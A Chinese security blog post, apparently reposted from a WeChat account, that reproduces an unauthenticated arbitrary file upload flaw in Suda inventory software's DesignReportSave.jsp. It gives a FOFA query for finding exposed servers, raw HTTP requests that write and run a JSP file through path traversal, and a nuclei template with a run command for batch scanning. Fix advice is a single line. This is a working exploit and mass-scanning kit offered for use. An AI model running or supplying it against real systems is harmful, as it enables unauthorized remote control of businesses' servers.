【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)

admin
admin
admin
103867
文章
87
评论
2023年12月18日13:38:58评论55 views字数 2935阅读9分47秒阅读模式


朋友们大家好,近期去西藏高反了,就停更了一个礼拜,从今天开始会继续更新。


使



01

漏洞名称



速达天耀软件DesignReportSave.jsp接口存在任意文件上传漏洞


02


漏洞影响


速达天耀软件多个版本都存在任意文件上传漏洞

【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)



03


漏洞描述


速达进销存管理系统是一套完整的企业业务管理系统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,全面提升了企业的管理能力和工作效率。该软件DesignReportSave.jsp接口处存在任意文件上传漏洞,未授权攻击者可以利用该漏洞上传恶意文件进而远控服务器。


04


FOFA搜索语句
app="速达软件-公司产品"

【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)


05


漏洞复现


向靶场发送如下数据包上传文件

POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 27Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/octet-streamUpgrade-Insecure-Requests: 1
<% out.print("oessqeonylzaf");%>

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 7Content-Type: text/html;charset=GBKDate: Tue, 12 Dec 2023 08:43:03 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=6CAC89398438ED036786A57DD09382D; Path=/; HttpOnly

访问回显文件/xykqmfxpoas.jsp

GET /xykqmfxpoas.jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 8Content-Type: text/html;charset=ISO-8859-1Date: Tue, 12 Dec 2023 08:45:16 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=6CAC89398438ED036786A57DD09382D; Path=/; HttpOnly
oessqeonylzaf

证明存在漏洞


06


nuclei poc


nuclei批量扫描poc文件内容如下

id: suda-DesignReportSave-upload
info:  name: 速达软件DesignReportSave.jsp接口存在任意文件上传漏洞  author: fgz  severity: critical  description: 速达进销存管理系统是一套完整的企业业务管理系统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,全面提升了企业的管理能力和工作效率。该软件DesignReportSave.jsp接口处存在任意文件上传漏洞,未授权攻击者可以利用该漏洞上传恶意文件进而远控服务器。  metadata:    fofa-query: app="速达软件-公司产品"variables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  file_content: "{{to_lower(rand_text_alpha(8))}}"requests:  - raw:      - |        POST /report/DesignReportSave.jsp?report=../{{file_name}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip, deflate        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Connection: close        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Upgrade-Insecure-Requests: 1        Content-Type: application/octet-stream        Content-Length: 49                <% out.print("{{file_content}}");%>
      - |        GET /{{file_name}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'contains(body_2, "{{file_content}}")'

运行POC

nuclei.exe -t suda-DesignReportSave-upload.yaml -u http://x.x.x.x

【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)



07


修复建议


安装waf或者打官方补丁。


原文始发于微信公众号(AI与网安):【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日13:38:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】速达天耀软件任意文件上传漏洞(附poc)https://cn-sec.com/archives/2292975.html

发表评论

匿名网友 填写信息